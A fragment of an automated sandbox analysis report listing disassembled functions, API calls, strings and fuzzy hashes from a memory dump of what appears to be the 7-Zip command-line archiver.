                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree$fputc
                                • String ID: : $Write SFX:
                                • API String ID: 3584323934-2530961540
                                • Opcode ID: 4a627c73a7238c82c06dab0d44ee922f7b7063e7ca912513ee5259796f313b88
                                • Instruction ID: 978eab107f528d3652c645616572836bf123227a035189c349fdee9fde06c905
                                • Opcode Fuzzy Hash: 4a627c73a7238c82c06dab0d44ee922f7b7063e7ca912513ee5259796f313b88
                                • Instruction Fuzzy Hash: 000148A230494081DF20AB26E95439A5321E785FF8F48D3329E6D577E9DF6CC596C304
                                Function 00422E30 Relevance: 8.8, APIs: 7, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6aac4f8b66112ccdebbd1d1905c744c767a0f8c1bc3804467cf2c6bc99579525
                                • Instruction ID: f0b6af6329c11194e2649fdfde6d9ab5d88c1a81b251e3a1fb2e2d6f039b5ea6
                                • Opcode Fuzzy Hash: 6aac4f8b66112ccdebbd1d1905c744c767a0f8c1bc3804467cf2c6bc99579525
                                • Instruction Fuzzy Hash: 8FE0DC3265060D82DB14FB77E99116C1324E7D5F4C75411179E2DDF225CD5CCCA28384
                                Function 00454C98 Relevance: 7.7, APIs: 6, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30414a1d52f4da9f745089551c321dca5233e4042aa42c337b3be1ba5cafe1d0
                                • Instruction ID: 876f025dad5719d37607591b38ceac574e5d182b2dfd5891b6ecb81be8183bd8
                                • Opcode Fuzzy Hash: 30414a1d52f4da9f745089551c321dca5233e4042aa42c337b3be1ba5cafe1d0
                                • Instruction Fuzzy Hash: BA71E37332468492CB10DB26E88059EB3A0F3C4B99F404617EE9A4BB59DF7CC8D5CB08
                                Function 0043F580 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 202stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: strcmp
                                • String ID: =
                                • API String ID: 1004003707-2525689732
                                • Opcode ID: 0e249ffe8aca5e057bec8785a432b27c2d1d9d2ddb026999ed26aaef8aeed705
                                • Instruction ID: 9b6af6262b68e318425bdc34aa1e9d587cdd4708d1c5e20ce5ee3e0ffb5c7c84
                                • Opcode Fuzzy Hash: 0e249ffe8aca5e057bec8785a432b27c2d1d9d2ddb026999ed26aaef8aeed705
                                • Instruction Fuzzy Hash: 9461F33221968085CB20EF16E49159FBB61E7D9BD4F487127FB9B47729DA3CC886CB04
                                Function 00429D20 Relevance: 7.7, APIs: 6, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 43209498332682a02e7ce7fc75598344194703a03d02bd2ff963372942ffa5f8
                                • Instruction ID: 1d59ad0aa14893634f672a2a1ac64e2cbc313bc2f7306347e7ab1c6e2584a36a
                                • Opcode Fuzzy Hash: 43209498332682a02e7ce7fc75598344194703a03d02bd2ff963372942ffa5f8
                                • Instruction Fuzzy Hash: CA812673305AD486CB10EF2AE4943AD77A2F385F88F494526DE5A0BB69CF78C885C315
                                Function 0044D19C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 172COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID: Q
                                • API String ID: 0-3463352047
                                • Opcode ID: abed10ad6c520b63a86a48af59b276bb77a8b7c20d7b3ab632993d914fae1161
                                • Instruction ID: 522e7fa084636e37b7d6d887b9bc75cdeb1e807cd88e278dbacbb7bc6f3f857c
                                • Opcode Fuzzy Hash: abed10ad6c520b63a86a48af59b276bb77a8b7c20d7b3ab632993d914fae1161
                                • Instruction Fuzzy Hash: 7E619172714A8482DB20DF26E48016EB361F7C8BA4F545217FF9A57758DB7CC882CB09
                                Function 00452C2C Relevance: 7.6, APIs: 6, Instructions: 134COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: a0e6c24adbaa5689cbc3c6f00940dca7613124715223a3a9621f4f95d8ecc5a4
                                • Instruction ID: 51409177fed07a8b01f0540601f6fbf35b2b55e164cba517c7e65b19579d7696
                                • Opcode Fuzzy Hash: a0e6c24adbaa5689cbc3c6f00940dca7613124715223a3a9621f4f95d8ecc5a4
                                • Instruction Fuzzy Hash: 0641D7232082C096CB21DE2AE58005FBFF4E397794B540217FF9617B6ACA7DC195DB15
                                Function 0041CA40 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: act:$ cpus:$ gran:$ page:
                                • API String ID: 1294909896-454015223
                                • Opcode ID: cd77afef6a19f1e87174f2b9aa2f83a1400f9bbebe3f7a725566f3c63b0bae6c
                                • Instruction ID: 2c106869780ba3255ab42b2c8abec060d05af96ff02ec155c3b7761bb915081a
                                • Opcode Fuzzy Hash: cd77afef6a19f1e87174f2b9aa2f83a1400f9bbebe3f7a725566f3c63b0bae6c
                                • Instruction Fuzzy Hash: C44181B138460591CA24EF12EA813A97361A748BD4F449127AE0E47754DFBCD5E1C74C
                                Function 0042443C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 118COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 004244C5
                                • _CxxThrowException.MSVCRT ref: 004245B9
                                  • Part of subcall function 004240EC: _CxxThrowException.MSVCRT ref: 004241CC
                                • _CxxThrowException.MSVCRT ref: 004245EE
                                Strings
                                • Empty file path, xrefs: 0042459C
                                • There is no second file name for rename pair:, xrefs: 004245D1
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow$free
                                • String ID: Empty file path$There is no second file name for rename pair:
                                • API String ID: 3129652135-1725603831
                                • Opcode ID: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
                                • Instruction ID: 8bb9dabfca19f228a498b1920cb69fbf728bc6152c564ed26e9e7d78eda07a38
                                • Opcode Fuzzy Hash: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
                                • Instruction Fuzzy Hash: 3E41E2A33056D096CA20DB16E84039A6720F396BB8F809717EFBA077D4DB7CC486C749
                                Function 0045E1C0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: #
                                • API String ID: 1294909896-1885708031
                                • Opcode ID: 38055dc1e7462e097eae52bffdd7dad44dd24194a95989077b927179d5e71d61
                                • Instruction ID: b7e67addebe22660a32e4fd5d5dfa518eb47a16e2266617855db942953ff437a
                                • Opcode Fuzzy Hash: 38055dc1e7462e097eae52bffdd7dad44dd24194a95989077b927179d5e71d61
                                • Instruction Fuzzy Hash: 3D31C233244A9492CB24DA16E54015EA758F784BE5F54022BFF9F8B769CE7CCA86C708
                                Function 00414304 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                • String ID:
                                • API String ID: 2296236218-0
                                • Opcode ID: 52e4726711ec5748391007b40f94998213c969474937b66d9cbfd54a84faa804
                                • Instruction ID: 0d2819eb268df73bb58e29642332ac7c9668573dd88d489050959a522980f67e
                                • Opcode Fuzzy Hash: 52e4726711ec5748391007b40f94998213c969474937b66d9cbfd54a84faa804
                                • Instruction Fuzzy Hash: 0131D073704AC586CB20CF25E48479FBBA5F788B94F558126DB8967B24DB3CC886C705
                                Function 004387C4 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorFileLastSecurity$free
                                • String ID:
                                • API String ID: 3917221116-0
                                • Opcode ID: 1deff44bebb09b3987138b518eac41eabb6cc904571c96ae21e56ec8c08d36d3
                                • Instruction ID: 9f8a899044b0bed81b7bc4886810f811115fc3424bdb69d08f61d4b036136319
                                • Opcode Fuzzy Hash: 1deff44bebb09b3987138b518eac41eabb6cc904571c96ae21e56ec8c08d36d3
                                • Instruction Fuzzy Hash: B9318C737057809AD7149F26E8007AEB3A1F788B98F58413AEF895B754DF38C846C705
                                Function 00428148 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$wcscmp
                                • String ID:
                                • API String ID: 4021281200-0
                                • Opcode ID: 22d44a6049aa5533ca4e073c02e8b0dae08f906ceeccbcac1509b0922c34b677
                                • Instruction ID: a2aa9990210c98041322d304bb8e1587d1f053aecf9033881d73b122a4805b09
                                • Opcode Fuzzy Hash: 22d44a6049aa5533ca4e073c02e8b0dae08f906ceeccbcac1509b0922c34b677
                                • Instruction Fuzzy Hash: BF319A72316B40C6D720DF12F98431EB764F7847A4F58822AEEAA47798DF7CC8818B14
                                Function 00416EA4 Relevance: 7.6, APIs: 5, Instructions: 74filetimeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: File$Create$CloseHandleTimefree
                                • String ID:
                                • API String ID: 234454789-0
                                • Opcode ID: c728b8dd31556345467ffe1da12aa57c87299959c4f069fc15c4c46e01533b6a
                                • Instruction ID: e5870cd7408e98decc4ad5abd75801424ce949377ba4cd423136df876c693d26
                                • Opcode Fuzzy Hash: c728b8dd31556345467ffe1da12aa57c87299959c4f069fc15c4c46e01533b6a
                                • Instruction Fuzzy Hash: B021C27220468086D6209F26FA54B9A6620F385BF8F540322EE79437D8CB3DC986C648
                                Function 00417564 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentDirectoryW.KERNEL32 ref: 0041759A
                                • GetCurrentDirectoryW.KERNEL32 ref: 004175F4
                                • free.MSVCRT ref: 00417606
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CurrentDirectoryfree$memmove
                                • String ID:
                                • API String ID: 4010226229-0
                                • Opcode ID: 368a11c4d41f2519a69cee4a7fec56a683d7dfd260bf15628a21872b28a41d3e
                                • Instruction ID: c32a21ba6c68bf104816518eac272af140c7de04c86cb77c7622e2a682153bae
                                • Opcode Fuzzy Hash: 368a11c4d41f2519a69cee4a7fec56a683d7dfd260bf15628a21872b28a41d3e
                                • Instruction Fuzzy Hash: 0121C73221CB4483CB209F25E4847AE6371F784768F505316EA9A877A4EF7DCAC5CB15
                                Function 0042978C Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: b8ec584b560308700cc719fe69e1a7bb64ec45b8d30b4df46fd101b6897b48f8
                                • Instruction ID: fc179349d6cdd62aab15a3ad36697c7cc6bec52121955d156e63589e488f5356
                                • Opcode Fuzzy Hash: b8ec584b560308700cc719fe69e1a7bb64ec45b8d30b4df46fd101b6897b48f8
                                • Instruction Fuzzy Hash: 88118EA232875091FA14AF2BA9403A523659B17FC4FC85026CE098A309FF7CCA46E20D
                                Function 0041E960 Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: 78dc16436171f411aa0328f5a3ed5716f1326067f0e8e8d7e17c230dbfd3e929
                                • Instruction ID: e0e22ddf349a5e4eda7b885057c896fac6482afa26ee0c9afa2ca4302952364b
                                • Opcode Fuzzy Hash: 78dc16436171f411aa0328f5a3ed5716f1326067f0e8e8d7e17c230dbfd3e929
                                • Instruction Fuzzy Hash: F91190FA32974591EA149B2B98403F923666B16FC4FC45426DE0957309FF6CCA86D30D
                                Function 0044AD88 Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: 268113d5be270a562f7383196f03c6f9e924eee01447992a60fd605f9f4079f5
                                • Instruction ID: b2a5a81eece420eb1718053f2ed77bcbf1062565a0d996db9e87dfe949844ba3
                                • Opcode Fuzzy Hash: 268113d5be270a562f7383196f03c6f9e924eee01447992a60fd605f9f4079f5
                                • Instruction Fuzzy Hash: 4F1190F63C574591FB149B2B98413A523665B1AFC4FD44426CE094A309FF7CCA66E30E
                                Function 0042E588 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 0042E621
                                  • Part of subcall function 0042E1DC: memset.MSVCRT ref: 0042E1FF
                                  • Part of subcall function 0042E1DC: strlen.MSVCRT ref: 0042E21E
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememsetstrlen
                                • String ID: ?$ MB$, # $RAM
                                • API String ID: 2062123303-3586855483
                                • Opcode ID: a31aee8ee038967564c260756f0c0934e99b2ade99b10984ad30e53087e54350
                                • Instruction ID: 97df46a5594adf1f20e994543f25879124d8ff85db357d3c5daa41eb96223db1
                                • Opcode Fuzzy Hash: a31aee8ee038967564c260756f0c0934e99b2ade99b10984ad30e53087e54350
                                • Instruction Fuzzy Hash: 94118C72308A1596DA20DF27E41435D6320A789FE9F858222DF9E47764DF2DCA47C308
                                Function 00446F74 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041C684: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,00446FAE), ref: 0041C6AF
                                  • Part of subcall function 0041C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C5EA
                                  • Part of subcall function 0041C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C638
                                • free.MSVCRT ref: 00447027
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00419164: free.MSVCRT ref: 004191EC
                                • free.MSVCRT ref: 0044700F
                                • free.MSVCRT ref: 0044701A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$QueryValue$Openmemmove
                                • String ID: 7z.dll$Software\7-zip
                                • API String ID: 2771487249-1558686312
                                • Opcode ID: b3266d8cb8d56b5d9a87b488a01587aa72cdf24287fc1b58982ca6b4790d8148
                                • Instruction ID: 51a5d9ba4bea4da1839699992c0493a55addc5430115230f8213ea67e4219813
                                • Opcode Fuzzy Hash: b3266d8cb8d56b5d9a87b488a01587aa72cdf24287fc1b58982ca6b4790d8148
                                • Instruction Fuzzy Hash: 38110D7234464450CA20EB23E9513EEA711DBD5BE8F841317AE5D877A5DF2CC6C6CB08
                                Function 00461A98 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free
                                • String ID:
                                • API String ID: 3873070119-0
                                • Opcode ID: 25e21201a733acb9d1aa11cb72841802ea41e4279b4764451413be464fb1f992
                                • Instruction ID: e423c271f3f9c4469f23d84cec1d673150f687884f274f7a262298e9275e1852
                                • Opcode Fuzzy Hash: 25e21201a733acb9d1aa11cb72841802ea41e4279b4764451413be464fb1f992
                                • Instruction Fuzzy Hash: EA115173315A4482DB20DB26E94076E6320F7C5BA9F408226EF9D43BA4DF2CC955C304
                                Function 004173B0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
